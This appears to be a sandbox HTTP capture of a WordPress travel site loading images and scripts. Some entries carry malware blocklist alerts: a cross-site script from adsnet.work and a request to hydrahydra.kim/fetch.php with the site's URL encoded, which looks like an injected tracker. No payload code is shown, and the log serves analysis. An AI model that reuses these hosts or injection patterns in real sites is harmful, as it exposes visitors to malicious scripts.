User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 26864
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x405, components 3\012- data
Size:   26864
Md5:    6e5ad791f548e4da07404985a9737343
Sha1:   aad04722efbe7e9771326155c241477b982d58fb
Sha256: 4c499c0136106e7c82ff44863252d8a4a8bdf70b4bd76db0db62319f68b17e05
                                        
                                            GET /wp-content/uploads/2018/08/logo4.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 03:04:29 GMT
Accept-Ranges: bytes
Content-Length: 1992
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 38x55, components 3\012- data
Size:   1992
Md5:    c112178d919e27c1c0519482ae8538d7
Sha1:   3eafd41f298f22c74e1fc7c463e1d05a1b5451f9
Sha256: 76b8a09640fbc6e423c2d8ae3367415ba6a27aa0ecd3f87889ca642e72ca8368
                                        
                                            GET /wp-content/uploads/2018/08/hamm.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 16:08:20 GMT
Accept-Ranges: bytes
Content-Length: 46302
Keep-Alive: timeout=3, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 299x299, segment length 16, baseline, precision 8, 640x248, components 3\012- data
Size:   46302
Md5:    3db32f0007744ef022658cde5022c673
Sha1:   c14fbf2d14d101038a5db478d49e0b8257a4e405
Sha256: e1067c429d672a0e63d612304511a327fe79feb74ffe930f0f7a142a652509eb
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "386B247C754310781563BA12E2D337B5CBF568A20717F18B5550614EEE597EF5"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21583
Expires: Thu, 01 Dec 2022 18:45:32 GMT
Date: Thu, 01 Dec 2022 12:45:49 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img1.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 28676
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x458, components 3\012- data
Size:   28676
Md5:    afc67957823378e19cbb5d6c8e2d8d4e
Sha1:   e5e18086fb0ad14655212ef9a2f028cccb06cefa
Sha256: cb2827d9d6c253869047d413744ef9d25cbeb3cf14519f0aeb9410ed8bf3dae8
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img3.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 46391
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x405, components 3\012- data
Size:   46391
Md5:    6a5d207bfb1d4f38997520050e81b5f3
Sha1:   dfff8de2b7585c8dc3d523043843551ba761a958
Sha256: 8a5bb0988e36c711179c32162c3f6af8ee862088d4c0a2fb9b18af81e43dde90
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: http://www.hotelsweb.site/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Wed, 22 Aug 2018 04:45:45 GMT
Accept-Ranges: bytes
Content-Length: 77160
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 77160, version 4.459\012- data
Size:   77160
Md5:    af7ae505a9eed503f8b8e6982036873e
Sha1:   d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c
Sha256: 2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img9.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 23821
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x300, components 3\012- data
Size:   23821
Md5:    5ba52dd8f2abe2df6caff0b26aa1c035
Sha1:   127bff082de765a274a659a8036dbc21be5a3a58
Sha256: 0227ac15cdda5f0aae46dc3e203d2598ec225526ece22a84d693123728cc3706
                                        
                                            GET /scripts/place.js HTTP/1.1 
Host: adsnet.work
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text
Size:   377
Md5:    4435b6168b6acda2edea1c16ab2d857a
Sha1:   eff2c42517e44a568b5011125b5cba022f27f67f
Sha256: dcd5ff0b5118befd94a04b7bbc750b5a7b473e39fefd81e235f79bd848916569

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img10.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 25670
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x300, components 3\012- data
Size:   25670
Md5:    5269e76b4cf719ae8c888a9f403936d7
Sha1:   1a18b5af3652fc2788969d802c201de0814c86cc
Sha256: c6f4cf401856130e7b79858d6d37e791a140f90042637311fc23dafcc764d67e
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img2.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 188292
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 2200x1465, components 3\012- data
Size:   188292
Md5:    6f029a0c0d7d958cd4fce3c5a336504c
Sha1:   f203125d72b81f3564edb65ae0d7055325d2a835
Sha256: 23425eb441bc08086a231aaf326e0e4b068835c01d0f34d818a0869425525d4c
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img5.jpg HTTP/1.1 
Host: hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=0fcd008c614b44b0c690d2c5ada6541f

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33947
Keep-Alive: timeout=3, max=100


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x405, components 3\012- data
Size:   33947
Md5:    cc74b859b4a7bb7c9260a7dac0a6cdae
Sha1:   e7849e55c301ab8de0fbf5b19c3e57a9506c656a
Sha256: 124fd45a9b9b932dec2307cc03fdd4c8afb319825e4813cf95c516a02836ed2e
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img12.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31381
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x300, components 3\012- data
Size:   31381
Md5:    ec1dc8ac96cfed397d0d97ea7c203528
Sha1:   597a65fab99f5f8b4a0146d931c293e2dd22be4f
Sha256: b6b13e2852f9228707d55176d88995f6117eeaf038e37ec20c5125b98f1fcb82
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img14.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33178
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   33178
Md5:    13812f654aac0049de496aa17ef6c4fa
Sha1:   c3919ae7d6b674fc2778dd7c6dd0c31cdad97836
Sha256: 93655cd7d87085b9303906e935d5f9dc0882aae6b4257cc7ae50904073461224
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img11.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31761
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x300, components 3\012- data
Size:   31761
Md5:    6f48dee6c8ab44bab7bbe3e6df46ad8f
Sha1:   252d1a6fca0501ade4a8699d913de338ade0dbbb
Sha256: 8c669467a6210aac06ff5bcdf26311493cb2072c49cf0a9556015eaef60ae4b3
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img15.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 28011
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 410x250, components 3\012- data
Size:   28011
Md5:    1e371f3ff649df58c23acce31761c31f
Sha1:   9178dd58f4c21f7cbf3e318efca3a6792ccf8756
Sha256: 5dc2ff3115d5794196e14d087f24a30a9e82ed3fbcea58298b929923fb60c3cd
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img16.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 30597
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 410x250, components 3\012- data
Size:   30597
Md5:    922fc9b1b0d01babc650d9ca31a7d078
Sha1:   09d738b55456dc393cdfaa6d453b662d37a4f9d9
Sha256: 7f8960b041a30a76460815e12b55033815d8cf92ad3b88fb33efb9d36d96c746
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img13.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 274612
Keep-Alive: timeout=3, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x790, components 3\012- data
Size:   274612
Md5:    c4aa6921f6d64521fbd4c897e2cef8eb
Sha1:   b95faf519de5b4d8c4b423a76b4f54a54e1d6d6d
Sha256: fe467c7cd9ab198a84c7ddc16d5d528effac44abc94d06364d7624440f3944b4
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img18.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33928
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 410x250, components 3\012- data
Size:   33928
Md5:    526e62a086e534f6699a45e016edc1b1
Sha1:   626d9485ee0620137faaf4ac83d83d156876cb39
Sha256: 614477818cc0d798842ffeed6ba4eecba77292ba3f02f0c632b12bae29d3cd68
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img17.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 33488
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   33488
Md5:    fe0699038746940477cec9a5522bdaf5
Sha1:   e882a65a7be08f5130c48668a243e01a5fcfe9ea
Sha256: 2395ac4664e6667aebf945887995454630608d20165cab6bf83a32f0fe843316
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img19.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 25853
Keep-Alive: timeout=3, max=89
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   25853
Md5:    d134425489f1195d79fef5c38499afbe
Sha1:   725dafbb9c526fa68c4a400b783ad1f04ddf0cc6
Sha256: d5adebe39fab9a1a146ddb7efde27641d6f21128ee2a6b77de0de2bdf95bfd5b
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img22.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 28738
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   28738
Md5:    aba437b795351e84b9d418538cc1cd45
Sha1:   ffa687ffba4f1f79d9705b35f9fb3ddc98bb9938
Sha256: 103c07e51c894261a1f92e3774d7219dd50cec69fada2ba3773317efbf1a3988
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img21.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 31982
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   31982
Md5:    26308ac0a5ad42fe0ef500ed06a56c0e
Sha1:   986e1d010a301265294a3d71fe1384d5743bbc48
Sha256: ebb382cc2bfae70d0c439aecabf3873a836d451dcc774b1da8c123cf3c41d4f1
                                        
                                            GET /fetch.php?tracker=adsnet.work&site=aHR0cDovL3d3dy5ob3RlbHN3ZWIuc2l0ZS8= HTTP/1.1 
Host: hydrahydra.kim
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/

                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img23.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 41560
Keep-Alive: timeout=3, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   41560
Md5:    22ca0f524670eddd368b576d12a3b897
Sha1:   36cb3afe06df5915cfc75b5c4b0a3aa32184c6f1
Sha256: 68d5c0328a72c33903e288ae0cd9fcbd7e32a32f031f750c96f963dc8ad00737
                                        
                                            GET /wp-content/themes/travel-agency/images/fallback-img-410-250.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 4292
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
